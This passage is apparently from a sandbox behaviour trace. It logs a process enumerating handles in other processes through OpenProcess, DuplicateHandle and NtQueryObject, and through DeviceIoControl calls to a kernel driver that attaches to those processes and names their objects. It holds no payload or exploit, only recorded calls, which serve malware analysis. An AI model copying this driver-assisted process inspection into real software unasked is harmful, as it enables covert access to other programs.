ResultLength=0x12e420*=0x14928) returned 0xc0000004 [0197.585] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.585] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x18000) returned 0x348b10 [0197.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0x18000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x14928) returned 0x0 [0197.585] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0197.585] GetCurrentProcess () returned 0xffffffffffffffff [0197.585] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0197.585] CloseHandle (hObject=0xc0) returned 1 [0197.585] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.585] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x80) returned 0x344c50 [0197.585] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.586] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0197.586] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.586] PsAcquireProcessExitSynchronization () returned 0x0 [0197.586] KeStackAttachProcess (in: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0) [0197.586] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80022a8680, HandleInformation=0x0) returned 0x0 [0197.586] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.586] PsReleaseProcessExitSynchronization () returned 0x2 [0197.586] ObfDereferenceObject (Object=0xfffffa8003074b30) returned 0xb [0197.586] ObQueryNameString (in: Object=0xfffffa80022a8680, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.586] ObfDereferenceObject (Object=0xfffffa80022a8680) returned 0x4 [0197.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.586] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.586] CloseHandle (hObject=0xc4) returned 1 [0197.586] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc4 [0197.587] GetCurrentProcess () returned 0xffffffffffffffff [0197.587] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0197.587] CloseHandle (hObject=0xc4) returned 1 [0197.587] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.587] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0197.587] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.587] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0197.587] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.587] PsAcquireProcessExitSynchronization () returned 0x0 [0197.587] KeStackAttachProcess (in: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0) [0197.587] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80026ac5f0, HandleInformation=0x0) returned 0x0 [0197.587] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.587] PsReleaseProcessExitSynchronization () returned 0x2 [0197.587] ObfDereferenceObject (Object=0xfffffa8003074b30) returned 0xb [0197.587] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3508) returned 0x0 [0197.587] ObfDereferenceObject (Object=0xfffffa80026ac5f0) returned 0x2 [0197.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.587] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.588] CloseHandle (hObject=0xc0) returned 1 [0197.588] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0197.588] GetCurrentProcess () returned 0xffffffffffffffff [0197.588] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0197.588] CloseHandle (hObject=0xc0) returned 1 [0197.588] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.588] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x80) returned 0x344c50 [0197.588] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.588] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.588] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0197.588] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.588] PsAcquireProcessExitSynchronization () returned 0x0 [0197.588] KeStackAttachProcess (in: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0) [0197.588] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000745eb0, HandleInformation=0x0) returned 0x0 [0197.588] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.589] PsReleaseProcessExitSynchronization () returned 0x2 [0197.589] ObfDereferenceObject (Object=0xfffffa8003074b30) returned 0xb [0197.589] ObQueryNameString (in: Object=0xfffff8a000745eb0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.589] ObfDereferenceObject (Object=0xfffff8a000745eb0) returned 0xdf [0197.589] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.589] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.589] CloseHandle (hObject=0xc4) returned 1 [0197.589] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc4 [0197.589] GetCurrentProcess () returned 0xffffffffffffffff [0197.589] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x14, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0197.589] CloseHandle (hObject=0xc4) returned 1 [0197.589] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.589] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x70) returned 0x344c50 [0197.589] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.589] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.589] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0xc0, lpOverlapped=0x0) returned 1 [0197.589] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.589] PsAcquireProcessExitSynchronization () returned 0x0 [0197.589] KeStackAttachProcess (in: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003074b30, ApcState=0xfffff880052b35d0) [0197.589] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a002788fa0, HandleInformation=0x0) returned 0x0 [0197.589] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.589] PsReleaseProcessExitSynchronization () returned 0x2 [0197.589] ObfDereferenceObject (Object=0xfffffa8003074b30) returned 0xb [0197.589] ObQueryNameString (in: Object=0xfffff8a002788fa0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.589] ObfDereferenceObject (Object=0xfffff8a002788fa0) returned 0x2 [0197.589] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.590] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.590] CloseHandle (hObject=0xc0) returned 1 [0197.590] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc0 [0197.590] GetCurrentProcess () returned 0xffffffffffffffff [0197.590] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0197.590] CloseHandle (hObject=0xc0) returned 1 [0197.590] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x344c50 [0197.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x344c50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x344c50*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0197.590] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b35a8 | out: Process=0xfffff880052b35a8) returned 0x0 [0197.590] PsAcquireProcessExitSynchronization () returned 0x0 [0197.590] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35c8 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35c8) [0197.590] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b35b0, HandleInformation=0x0 | out: Object=0xfffff880052b35b0*=0xfffffa8002f05380, HandleInformation=0x0) returned 0x0 [0197.590] PsReleaseProcessExitSynchronization () returned 0x2 [0197.590] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x13 [0197.590] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880052b35a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880052b35a4) returned 0xc0000004 [0197.590] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xfffff8a00278a630 [0197.590] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a00278a630, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a00278a630, ReturnLength=0x0) returned 0x0 [0197.590] ExFreePoolWithTag (P=0xfffff8a00278a630, Tag=0x0) [0197.590] ObfDereferenceObject (Object=0xfffffa8002f05380) returned 0x1 [0197.590] KeUnstackDetachProcess (ApcState=0xfffff880052b35c8) [0197.590] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.590] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.590] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0197.590] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.590] PsAcquireProcessExitSynchronization () returned 0x0 [0197.591] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) [0197.591] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002f05380, HandleInformation=0x0) returned 0x0 [0197.591] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.591] PsReleaseProcessExitSynchronization () returned 0x2 [0197.591] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x13 [0197.591] ObQueryNameString (in: Object=0xfffffa8002f05380, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.591] ObfDereferenceObject (Object=0xfffffa8002f05380) returned 0x1 [0197.591] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.591] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.591] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc0 [0197.591] GetCurrentProcess () returned 0xffffffffffffffff [0197.591] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0197.591] CloseHandle (hObject=0xc0) returned 1 [0197.591] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.591] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x344c50 [0197.591] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.591] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.591] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0197.591] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.591] PsAcquireProcessExitSynchronization () returned 0x0 [0197.591] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) [0197.591] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80118c4250, HandleInformation=0x0) returned 0x0 [0197.591] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.591] PsReleaseProcessExitSynchronization () returned 0x2 [0197.591] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x13 [0197.591] ObQueryNameString (in: Object=0xfffffa80118c4250, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.591] ObfDereferenceObject (Object=0xfffffa80118c4250) returned 0x14d [0197.592] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.592] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.592] CloseHandle (hObject=0xc4) returned 1 [0197.592] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc4 [0197.592] GetCurrentProcess () returned 0xffffffffffffffff [0197.592] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x58, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0197.592] CloseHandle (hObject=0xc4) returned 1 [0197.592] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0197.592] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0197.592] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0197.592] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0197.592] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0197.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x1a, lpOverlapped=0x0) returned 1 [0197.592] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0197.592] PsAcquireProcessExitSynchronization () returned 0x0 [0197.592] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) [0197.592] ObReferenceObjectByHandle (in: Handle=0x58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003674090, HandleInformation=0x0) returned 0x0 [0197.592] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0197.592] PsReleaseProcessExitSynchronization () returned 0x2 [0197.592] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x13 [0197.592] ObQueryNameString (in: Object=0xfffffa8003674090, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0197.592] ObfDereferenceObject (Object=0xfffffa8003674090) returned 0x581 [0197.592] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0197.592] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0197.592] CloseHandle (hObject=0xc0) returned 1 [0198.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc0 [0198.087] GetCurrentProcess () returned 0xffffffffffffffff [0198.087] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x50, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.088] CloseHandle (hObject=0xc0) returned 1 [0198.088] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.088] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.088] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.088] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.088] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.088] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.088] PsAcquireProcessExitSynchronization () returned 0x0 [0198.089] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) [0198.089] ObReferenceObjectByHandle (in: Handle=0x50, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e98060, HandleInformation=0x0) returned 0x0 [0198.089] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.089] PsReleaseProcessExitSynchronization () returned 0x2 [0198.089] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x11 [0198.089] ObQueryNameString (in: Object=0xfffffa8001e98060, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.089] ObfDereferenceObject (Object=0xfffffa8001e98060) returned 0x3 [0198.089] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.090] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.090] CloseHandle (hObject=0xc4) returned 1 [0198.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc4 [0198.090] GetCurrentProcess () returned 0xffffffffffffffff [0198.090] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x3c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0198.090] CloseHandle (hObject=0xc4) returned 1 [0198.090] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.090] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.090] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.091] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.091] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.091] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.091] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.091] PsAcquireProcessExitSynchronization () returned 0x0 [0198.091] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) 